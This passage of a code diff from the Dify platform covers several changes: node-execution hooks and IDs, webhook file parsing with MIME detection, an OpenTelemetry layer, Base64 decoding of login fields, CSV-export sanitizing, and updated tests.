# Silently ignore layer errors to prevent disrupting node execution
continue
def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None:
"""Invoke on_node_run_end hooks for all layers."""
for layer in self._layers:
try:
layer.on_node_run_end(node, error)
except Exception:
# Silently ignore layer errors to prevent disrupting node execution
continue

View File

@ -14,6 +14,7 @@ from configs import dify_config
from core.workflow.graph import Graph
from core.workflow.graph_events import GraphNodeEventBase
from ..layers.base import GraphEngineLayer
from ..ready_queue import ReadyQueue
from ..worker import Worker
@ -39,6 +40,7 @@ class WorkerPool:
ready_queue: ReadyQueue,
event_queue: queue.Queue[GraphNodeEventBase],
graph: Graph,
layers: list[GraphEngineLayer],
flask_app: "Flask | None" = None,
context_vars: "Context | None" = None,
min_workers: int | None = None,
@ -53,6 +55,7 @@ class WorkerPool:
ready_queue: Ready queue for nodes ready for execution
event_queue: Queue for worker events
graph: The workflow graph
layers: Graph engine layers for node execution hooks
flask_app: Optional Flask app for context preservation
context_vars: Optional context variables
min_workers: Minimum number of workers
@ -65,6 +68,7 @@ class WorkerPool:
self._graph = graph
self._flask_app = flask_app
self._context_vars = context_vars
self._layers = layers
# Scaling parameters with defaults
self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS
@ -144,6 +148,7 @@ class WorkerPool:
ready_queue=self._ready_queue,
event_queue=self._event_queue,
graph=self._graph,
layers=self._layers,
worker_id=worker_id,
flask_app=self._flask_app,
context_vars=self._context_vars,

View File

@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]):
def graph_init_params(self) -> "GraphInitParams":
return self._graph_init_params
@property
def execution_id(self) -> str:
return self._node_execution_id
def ensure_execution_id(self) -> str:
if not self._node_execution_id:
self._node_execution_id = str(uuid4())
return self._node_execution_id
def _hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT:
return cast(NodeDataT, self._node_data_type.model_validate(data))
@ -256,14 +265,12 @@ class Node(Generic[NodeDataT]):
raise NotImplementedError
def run(self) -> Generator[GraphNodeEventBase, None, None]:
# Generate a single node execution ID to use for all events
if not self._node_execution_id:
self._node_execution_id = str(uuid4())
execution_id = self.ensure_execution_id()
self._start_at = naive_utc_now()
# Create and push start event with required fields
start_event = NodeRunStartedEvent(
id=self._node_execution_id,
id=execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.title,
@ -321,7 +328,7 @@ class Node(Generic[NodeDataT]):
if isinstance(event, NodeEventBase): # pyright: ignore[reportUnnecessaryIsInstance]
yield self._dispatch(event)
elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id: # pyright: ignore[reportUnnecessaryIsInstance]
event.id = self._node_execution_id
event.id = self.execution_id
yield event
else:
yield event
@ -333,7 +340,7 @@ class Node(Generic[NodeDataT]):
error_type="WorkflowNodeError",
)
yield NodeRunFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
start_at=self._start_at,
@ -512,7 +519,7 @@ class Node(Generic[NodeDataT]):
match result.status:
case WorkflowNodeExecutionStatus.FAILED:
return NodeRunFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self.id,
node_type=self.node_type,
start_at=self._start_at,
@ -521,7 +528,7 @@ class Node(Generic[NodeDataT]):
)
case WorkflowNodeExecutionStatus.SUCCEEDED:
return NodeRunSucceededEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self.id,
node_type=self.node_type,
start_at=self._start_at,
@ -537,7 +544,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent:
return NodeRunStreamChunkEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
selector=event.selector,
@ -550,7 +557,7 @@ class Node(Generic[NodeDataT]):
match event.node_run_result.status:
case WorkflowNodeExecutionStatus.SUCCEEDED:
return NodeRunSucceededEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
start_at=self._start_at,
@ -558,7 +565,7 @@ class Node(Generic[NodeDataT]):
)
case WorkflowNodeExecutionStatus.FAILED:
return NodeRunFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
start_at=self._start_at,
@ -573,7 +580,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: PauseRequestedEvent) -> NodeRunPauseRequestedEvent:
return NodeRunPauseRequestedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED),
@ -583,7 +590,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent:
return NodeRunAgentLogEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
message_id=event.message_id,
@ -599,7 +606,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent:
return NodeRunLoopStartedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -612,7 +619,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent:
return NodeRunLoopNextEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -623,7 +630,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent:
return NodeRunLoopSucceededEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -637,7 +644,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: LoopFailedEvent) -> NodeRunLoopFailedEvent:
return NodeRunLoopFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -652,7 +659,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent:
return NodeRunIterationStartedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -665,7 +672,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent:
return NodeRunIterationNextEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -676,7 +683,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent:
return NodeRunIterationSucceededEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -690,7 +697,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent:
return NodeRunIterationFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -705,7 +712,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent:
return NodeRunRetrieverResourceEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
retriever_resources=event.retriever_resources,

View File

@ -1,14 +1,22 @@
import logging
from collections.abc import Mapping
from typing import Any
from core.file import FileTransferMethod
from core.variables.types import SegmentType
from core.variables.variables import FileVariable
from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.enums import NodeExecutionType, NodeType
from core.workflow.node_events import NodeRunResult
from core.workflow.nodes.base.node import Node
from factories import file_factory
from factories.variable_factory import build_segment_with_type
from .entities import ContentType, WebhookData
logger = logging.getLogger(__name__)
class TriggerWebhookNode(Node[WebhookData]):
node_type = NodeType.TRIGGER_WEBHOOK
@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]):
outputs=outputs,
)
def generate_file_var(self, param_name: str, file: dict):
related_id = file.get("related_id")
transfer_method_value = file.get("transfer_method")
if transfer_method_value:
transfer_method = FileTransferMethod.value_of(transfer_method_value)
match transfer_method:
case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL:
file["upload_file_id"] = related_id
case FileTransferMethod.TOOL_FILE:
file["tool_file_id"] = related_id
case FileTransferMethod.DATASOURCE_FILE:
file["datasource_file_id"] = related_id
try:
file_obj = file_factory.build_from_mapping(
mapping=file,
tenant_id=self.tenant_id,
)
file_segment = build_segment_with_type(SegmentType.FILE, file_obj)
return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name])
except ValueError:
logger.error(
"Failed to build FileVariable for webhook file parameter %s",
param_name,
exc_info=True,
)
return None
def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]:
"""Extract outputs based on node configuration from webhook inputs."""
outputs = {}
@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]):
outputs[param_name] = str(webhook_data.get("body", {}).get("raw", ""))
continue
elif self.node_data.content_type == ContentType.BINARY:
outputs[param_name] = webhook_data.get("body", {}).get("raw", b"")
raw_data: dict = webhook_data.get("body", {}).get("raw", {})
file_var = self.generate_file_var(param_name, raw_data)
if file_var:
outputs[param_name] = file_var
else:
outputs[param_name] = raw_data
continue
if param_type == "file":
# Get File object (already processed by webhook controller)
file_obj = webhook_data.get("files", {}).get(param_name)
outputs[param_name] = file_obj
files = webhook_data.get("files", {})
if files and isinstance(files, dict):
file = files.get(param_name)
if file and isinstance(file, dict):
file_var = self.generate_file_var(param_name, file)
if file_var:
outputs[param_name] = file_var
else:
outputs[param_name] = files
else:
outputs[param_name] = files
else:
outputs[param_name] = files
else:
# Get regular body parameter
outputs[param_name] = webhook_data.get("body", {}).get(param_name)
# Include raw webhook data for debugging/advanced use
outputs["_webhook_raw"] = webhook_data
return outputs

View File

@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError
from core.workflow.graph import Graph
from core.workflow.graph_engine import GraphEngine
from core.workflow.graph_engine.command_channels import InMemoryChannel
from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer
from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer
from core.workflow.graph_engine.protocols.command_channel import CommandChannel
from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent
from core.workflow.nodes import NodeType
@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING
from core.workflow.runtime import GraphRuntimeState, VariablePool
from core.workflow.system_variable import SystemVariable
from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool
from extensions.otel.runtime import is_instrument_flag_enabled
from factories import file_factory
from models.enums import UserFrom
from models.workflow import Workflow
@ -98,6 +99,10 @@ class WorkflowEntry:
)
self.graph_engine.layer(limits_layer)
# Add observability layer when OTel is enabled
if dify_config.ENABLE_OTEL or is_instrument_flag_enabled():
self.graph_engine.layer(ObservabilityLayer())
def run(self) -> Generator[GraphEngineEvent, None, None]:
graph_engine = self.graph_engine

View File

@ -22,8 +22,8 @@ login_manager = flask_login.LoginManager()
@login_manager.request_loader
def load_user_from_request(request_from_flask_login):
"""Load user based on the request."""
# Skip authentication for documentation endpoints (only when Swagger is enabled)
if dify_config.swagger_ui_enabled and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")):
# Skip authentication for documentation endpoints
if dify_config.SWAGGER_UI_ENABLED and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")):
return None
auth_token = extract_access_token(request)

View File

@ -1,5 +1,4 @@
import functools
import os
from collections.abc import Callable
from typing import Any, TypeVar, cast
@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer
from configs import dify_config
from extensions.otel.decorators.handler import SpanHandler
from extensions.otel.runtime import is_instrument_flag_enabled
T = TypeVar("T", bound=Callable[..., Any])
_HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()}
def _is_instrument_flag_enabled() -> bool:
"""
Check if external instrumentation is enabled via environment variable.
Third-party non-invasive instrumentation agents set this flag to coordinate
with Dify's manual OpenTelemetry instrumentation.
"""
return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true"
def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler:
"""Get or create a singleton instance of the handler class."""
if handler_class not in _HANDLER_INSTANCES:
@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T],
def decorator(func: T) -> T:
@functools.wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()):
if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()):
return func(*args, **kwargs)
handler = _get_handler_instance(handler_class or SpanHandler)

View File

@ -1,4 +1,5 @@
import logging
import os
import sys
from typing import Union
@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs):
if dify_config.DEBUG:
logger.info("Initializing OpenTelemetry for Celery worker")
CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument()
def is_instrument_flag_enabled() -> bool:
"""
Check if external instrumentation is enabled via environment variable.
Third-party non-invasive instrumentation agents set this flag to coordinate
with Dify's manual OpenTelemetry instrumentation.
"""
return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true"

View File

@ -1,3 +1,4 @@
import logging
import mimetypes
import os
import re
@ -17,6 +18,8 @@ from core.helper import ssrf_proxy
from extensions.ext_database import db
from models import MessageFile, ToolFile, UploadFile
logger = logging.getLogger(__name__)
def build_from_message_files(
*,
@ -356,15 +359,20 @@ def _build_from_tool_file(
transfer_method: FileTransferMethod,
strict_type_validation: bool = False,
) -> File:
# Backward/interop compatibility: allow tool_file_id to come from related_id or URL
tool_file_id = mapping.get("tool_file_id")
if not tool_file_id:
raise ValueError(f"ToolFile {tool_file_id} not found")
tool_file = db.session.scalar(
select(ToolFile).where(
ToolFile.id == mapping.get("tool_file_id"),
ToolFile.id == tool_file_id,
ToolFile.tenant_id == tenant_id,
)
)
if tool_file is None:
raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found")
raise ValueError(f"ToolFile {tool_file_id} not found")
extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin"
@ -402,10 +410,13 @@ def _build_from_datasource_file(
transfer_method: FileTransferMethod,
strict_type_validation: bool = False,
) -> File:
datasource_file_id = mapping.get("datasource_file_id")
if not datasource_file_id:
raise ValueError(f"DatasourceFile {datasource_file_id} not found")
datasource_file = (
db.session.query(UploadFile)
.where(
UploadFile.id == mapping.get("datasource_file_id"),
UploadFile.id == datasource_file_id,
UploadFile.tenant_id == tenant_id,
)
.first()

api/libs/encryption.py (new file, 66 lines)
View File

@ -0,0 +1,66 @@
"""
Field Encoding/Decoding Utilities
Provides Base64 decoding for sensitive fields (password, verification code)
received from the frontend.
Note: This uses Base64 encoding for obfuscation, not cryptographic encryption.
Real security relies on HTTPS for transport layer encryption.
"""
import base64
import logging
logger = logging.getLogger(__name__)
class FieldEncryption:
"""Handle decoding of sensitive fields during transmission"""
@classmethod
def decrypt_field(cls, encoded_text: str) -> str | None:
"""
Decode Base64 encoded field from frontend.
Args:
encoded_text: Base64 encoded text from frontend
Returns:
Decoded plaintext, or None if decoding fails
"""
try:
# Decode base64
decoded_bytes = base64.b64decode(encoded_text)
decoded_text = decoded_bytes.decode("utf-8")
logger.debug("Field decoding successful")
return decoded_text
except Exception:
# Decoding failed - return None to trigger error in caller
return None
@classmethod
def decrypt_password(cls, encrypted_password: str) -> str | None:
"""
Decrypt password field
Args:
encrypted_password: Encrypted password from frontend
Returns:
Decrypted password or None if decryption fails
"""
return cls.decrypt_field(encrypted_password)
@classmethod
def decrypt_verification_code(cls, encrypted_code: str) -> str | None:
"""
Decrypt verification code field
Args:
encrypted_code: Encrypted code from frontend
Returns:
Decrypted code or None if decryption fails
"""
return cls.decrypt_field(encrypted_code)
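
A round-trip sketch (not part of the diff) of the decode contract; the module path comes from the file header above, and the sample values are illustrative:

```python
import base64

from libs.encryption import FieldEncryption

encoded = base64.b64encode("S3cret-Pass!".encode("utf-8")).decode()
assert FieldEncryption.decrypt_field(encoded) == "S3cret-Pass!"
assert FieldEncryption.decrypt_password(encoded) == "S3cret-Pass!"

# Valid Base64 that is not valid UTF-8 text decodes to None, which the wraps.py
# decorators earlier in this diff turn into an authentication error.
not_utf8 = base64.b64encode(b"\xff\xfe").decode()
assert FieldEncryption.decrypt_field(not_utf8) is None
```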

View File

@ -131,28 +131,12 @@ class ExternalApi(Api):
}
def __init__(self, app: Blueprint | Flask, *args, **kwargs):
import logging
import os
kwargs.setdefault("authorizations", self._authorizations)
kwargs.setdefault("security", "Bearer")
# Security: Use computed swagger_ui_enabled which respects DEPLOY_ENV
swagger_enabled = dify_config.swagger_ui_enabled
kwargs["add_specs"] = swagger_enabled
kwargs["doc"] = dify_config.SWAGGER_UI_PATH if swagger_enabled else False
kwargs["add_specs"] = dify_config.SWAGGER_UI_ENABLED
kwargs["doc"] = dify_config.SWAGGER_UI_PATH if dify_config.SWAGGER_UI_ENABLED else False
# manual separate call on construction and init_app to ensure configs in kwargs effective
super().__init__(app=None, *args, **kwargs)
self.init_app(app, **kwargs)
register_external_error_handlers(self)
# Security: Log warning when Swagger is enabled in production environment
deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION")
if swagger_enabled and deploy_env.upper() == "PRODUCTION":
logger = logging.getLogger(__name__)
logger.warning(
"SECURITY WARNING: Swagger UI is ENABLED in PRODUCTION environment. "
"This may expose sensitive API documentation. "
"Set SWAGGER_UI_ENABLED=false or remove the explicit setting to disable."
)

View File

@ -184,7 +184,7 @@ def timezone(timezone_string):
def convert_datetime_to_date(field, target_timezone: str = ":tz"):
if dify_config.DB_TYPE == "postgresql":
return f"DATE(DATE_TRUNC('day', {field} AT TIME ZONE 'UTC' AT TIME ZONE {target_timezone}))"
elif dify_config.DB_TYPE == "mysql":
elif dify_config.DB_TYPE in ["mysql", "oceanbase", "seekdb"]:
return f"DATE(CONVERT_TZ({field}, 'UTC', {target_timezone}))"
else:
raise NotImplementedError(f"Unsupported database type: {dify_config.DB_TYPE}")

View File

@ -8,6 +8,7 @@ from sqlalchemy import or_, select
from werkzeug.datastructures import FileStorage
from werkzeug.exceptions import NotFound
from core.helper.csv_sanitizer import CSVSanitizer
from extensions.ext_database import db
from extensions.ext_redis import redis_client
from libs.datetime_utils import naive_utc_now
@ -158,6 +159,12 @@ class AppAnnotationService:
@classmethod
def export_annotation_list_by_app_id(cls, app_id: str):
"""
Export all annotations for an app with CSV injection protection.
Sanitizes question and content fields to prevent formula injection attacks
when exported to CSV format.
"""
# get app info
_, current_tenant_id = current_account_with_tenant()
app = (
@ -174,6 +181,16 @@ class AppAnnotationService:
.order_by(MessageAnnotation.created_at.desc())
.all()
)
# Sanitize CSV-injectable fields to prevent formula injection
for annotation in annotations:
# Sanitize question field if present
if annotation.question:
annotation.question = CSVSanitizer.sanitize_value(annotation.question)
# Sanitize content field (answer)
if annotation.content:
annotation.content = CSVSanitizer.sanitize_value(annotation.content)
return annotations
@classmethod

View File

@ -1419,7 +1419,7 @@ class DocumentService:
document.name = name
db.session.add(document)
if document.data_source_info_dict:
if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict:
db.session.query(UploadFile).where(
UploadFile.id == document.data_source_info_dict["upload_file_id"]
).update({UploadFile.name: name})

View File

@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError
from services.trigger.app_trigger_service import AppTriggerService
from services.workflow.entities import WebhookTriggerData
try:
import magic
except ImportError:
magic = None # type: ignore[assignment]
logger = logging.getLogger(__name__)
@ -317,7 +322,8 @@ class WebhookService:
try:
file_content = request.get_data()
if file_content:
file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger)
mimetype = cls._detect_binary_mimetype(file_content)
file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger)
return {"raw": file_obj.to_dict()}, {}
else:
return {"raw": None}, {}
@ -341,6 +347,18 @@ class WebhookService:
body = {"raw": ""}
return body, {}
@staticmethod
def _detect_binary_mimetype(file_content: bytes) -> str:
"""Guess MIME type for binary payloads using python-magic when available."""
if magic is not None:
try:
detected = magic.from_buffer(file_content[:1024], mime=True)
if detected:
return detected
except Exception:
logger.debug("python-magic detection failed for octet-stream payload")
return "application/octet-stream"
@classmethod
def _process_file_uploads(
cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger

View File

@ -410,9 +410,12 @@ class VariableTruncator(BaseTruncator):
@overload
def _truncate_json_primitives(self, val: None, target_size: int) -> _PartResult[None]: ...
@overload
def _truncate_json_primitives(self, val: File, target_size: int) -> _PartResult[File]: ...
def _truncate_json_primitives(
self,
val: UpdatedVariable | str | list[object] | dict[str, object] | bool | int | float | None,
val: UpdatedVariable | File | str | list[object] | dict[str, object] | bool | int | float | None,
target_size: int,
) -> _PartResult[Any]:
"""Truncate a value within an object to fit within budget."""
@ -425,6 +428,9 @@ class VariableTruncator(BaseTruncator):
return self._truncate_array(val, target_size)
elif isinstance(val, dict):
return self._truncate_object(val, target_size)
elif isinstance(val, File):
# File objects should not be truncated, return as-is
return _PartResult(val, self.calculate_json_size(val), False)
elif val is None or isinstance(val, (bool, int, float)):
return _PartResult(val, self.calculate_json_size(val), False)
else:

View File

@ -113,16 +113,31 @@ class TestShardedRedisBroadcastChannelIntegration:
topic = broadcast_channel.topic(topic_name)
producer = topic.as_producer()
subscriptions = [topic.subscribe() for _ in range(subscriber_count)]
ready_events = [threading.Event() for _ in range(subscriber_count)]
def producer_thread():
time.sleep(0.2) # Allow all subscribers to connect
deadline = time.time() + 5.0
for ev in ready_events:
remaining = deadline - time.time()
if remaining <= 0:
break
if not ev.wait(timeout=max(0.0, remaining)):
pytest.fail("subscriber did not become ready before publish deadline")
producer.publish(message)
time.sleep(0.2)
for sub in subscriptions:
sub.close()
def consumer_thread(subscription: Subscription) -> list[bytes]:
def consumer_thread(subscription: Subscription, ready_event: threading.Event) -> list[bytes]:
received_msgs = []
# Prime subscription so the underlying Pub/Sub listener thread starts before publishing
try:
_ = subscription.receive(0.01)
except SubscriptionClosedError:
return received_msgs
finally:
ready_event.set()
while True:
try:
msg = subscription.receive(0.1)
@ -137,7 +152,10 @@ class TestShardedRedisBroadcastChannelIntegration:
with ThreadPoolExecutor(max_workers=subscriber_count + 1) as executor:
producer_future = executor.submit(producer_thread)
consumer_futures = [executor.submit(consumer_thread, subscription) for subscription in subscriptions]
consumer_futures = [
executor.submit(consumer_thread, subscription, ready_events[idx])
for idx, subscription in enumerate(subscriptions)
]
producer_future.result(timeout=10.0)
msgs_by_consumers = []

View File

@ -233,7 +233,7 @@ class TestWebhookService:
"/webhook",
method="POST",
headers={"Content-Type": "multipart/form-data"},
data={"message": "test", "upload": file_storage},
data={"message": "test", "file": file_storage},
):
webhook_trigger = MagicMock()
webhook_trigger.tenant_id = "test_tenant"
@ -242,7 +242,7 @@ class TestWebhookService:
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["message"] == "test"
assert "upload" in webhook_data["files"]
assert "file" in webhook_data["files"]
# Verify file processing was called
mock_external_dependencies["tool_file_manager"].assert_called_once()
@ -414,7 +414,7 @@ class TestWebhookService:
"data": {
"method": "post",
"content_type": "multipart/form-data",
"body": [{"name": "upload", "type": "file", "required": True}],
"body": [{"name": "file", "type": "file", "required": True}],
}
}

View File

@ -9,6 +9,7 @@ import io
from unittest.mock import MagicMock, patch
import pytest
from pandas.errors import ParserError
from werkzeug.datastructures import FileStorage
from configs import dify_config
@ -250,20 +251,22 @@ class TestAnnotationImportServiceValidation:
"""Test that invalid CSV format is handled gracefully."""
from services.annotation_service import AppAnnotationService
# Create invalid CSV content
# Any content works here because we force a ParserError via the patch below
csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff'
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
with (
patch("services.annotation_service.current_account_with_tenant") as mock_auth,
patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")),
):
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
# Should return error message
assert "error_msg" in result
assert "malformed" in result["error_msg"].lower()
def test_valid_import_succeeds(self, mock_app, mock_db_session):
"""Test that valid import request succeeds."""

View File

@ -1,5 +1,6 @@
"""Test authentication security to prevent user enumeration."""
import base64
from unittest.mock import MagicMock, patch
import pytest
@ -11,6 +12,11 @@ from controllers.console.auth.error import AuthenticationFailedError
from controllers.console.auth.login import LoginApi
def encode_password(password: str) -> str:
"""Helper to encode password as Base64 for testing."""
return base64.b64encode(password.encode("utf-8")).decode()
class TestAuthenticationSecurity:
"""Test authentication endpoints for security against user enumeration."""
@ -42,7 +48,9 @@ class TestAuthenticationSecurity:
# Act
with self.app.test_request_context(
"/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"}
"/login",
method="POST",
json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")},
):
login_api = LoginApi()
@ -72,7 +80,9 @@ class TestAuthenticationSecurity:
# Act
with self.app.test_request_context(
"/login", method="POST", json={"email": "existing@example.com", "password": "WrongPass123!"}
"/login",
method="POST",
json={"email": "existing@example.com", "password": encode_password("WrongPass123!")},
):
login_api = LoginApi()
@ -104,7 +114,9 @@ class TestAuthenticationSecurity:
# Act
with self.app.test_request_context(
"/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"}
"/login",
method="POST",
json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")},
):
login_api = LoginApi()

View File

@ -8,6 +8,7 @@ This module tests the email code login mechanism including:
- Workspace creation for new users
"""
import base64
from unittest.mock import MagicMock, patch
import pytest
@ -25,6 +26,11 @@ from controllers.console.error import (
from services.errors.account import AccountRegisterError
def encode_code(code: str) -> str:
"""Helper to encode verification code as Base64 for testing."""
return base64.b64encode(code.encode("utf-8")).decode()
class TestEmailCodeLoginSendEmailApi:
"""Test cases for sending email verification codes."""
@ -290,7 +296,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "123456", "token": "valid_token"},
json={"email": "test@example.com", "code": encode_code("123456"), "token": "valid_token"},
):
api = EmailCodeLoginApi()
response = api.post()
@ -339,7 +345,12 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "newuser@example.com", "code": "123456", "token": "valid_token", "language": "en-US"},
json={
"email": "newuser@example.com",
"code": encode_code("123456"),
"token": "valid_token",
"language": "en-US",
},
):
api = EmailCodeLoginApi()
response = api.post()
@ -365,7 +376,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "123456", "token": "invalid_token"},
json={"email": "test@example.com", "code": encode_code("123456"), "token": "invalid_token"},
):
api = EmailCodeLoginApi()
with pytest.raises(InvalidTokenError):
@ -388,7 +399,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "different@example.com", "code": "123456", "token": "token"},
json={"email": "different@example.com", "code": encode_code("123456"), "token": "token"},
):
api = EmailCodeLoginApi()
with pytest.raises(InvalidEmailError):
@ -411,7 +422,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "wrong_code", "token": "token"},
json={"email": "test@example.com", "code": encode_code("wrong_code"), "token": "token"},
):
api = EmailCodeLoginApi()
with pytest.raises(EmailCodeError):
@ -497,7 +508,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "123456", "token": "token"},
json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"},
):
api = EmailCodeLoginApi()
with pytest.raises(WorkspacesLimitExceeded):
@ -539,7 +550,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "123456", "token": "token"},
json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"},
):
api = EmailCodeLoginApi()
with pytest.raises(NotAllowedCreateWorkspace):

View File

@ -8,6 +8,7 @@ This module tests the core authentication endpoints including:
- Account status validation
"""
import base64
from unittest.mock import MagicMock, patch
import pytest
@ -28,6 +29,11 @@ from controllers.console.error import (
from services.errors.account import AccountLoginError, AccountPasswordError
def encode_password(password: str) -> str:
"""Helper to encode password as Base64 for testing."""
return base64.b64encode(password.encode("utf-8")).decode()
class TestLoginApi:
"""Test cases for the LoginApi endpoint."""
@ -106,7 +112,9 @@ class TestLoginApi:
# Act
with app.test_request_context(
"/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"}
"/login",
method="POST",
json={"email": "test@example.com", "password": encode_password("ValidPass123!")},
):
login_api = LoginApi()
response = login_api.post()
@ -158,7 +166,11 @@ class TestLoginApi:
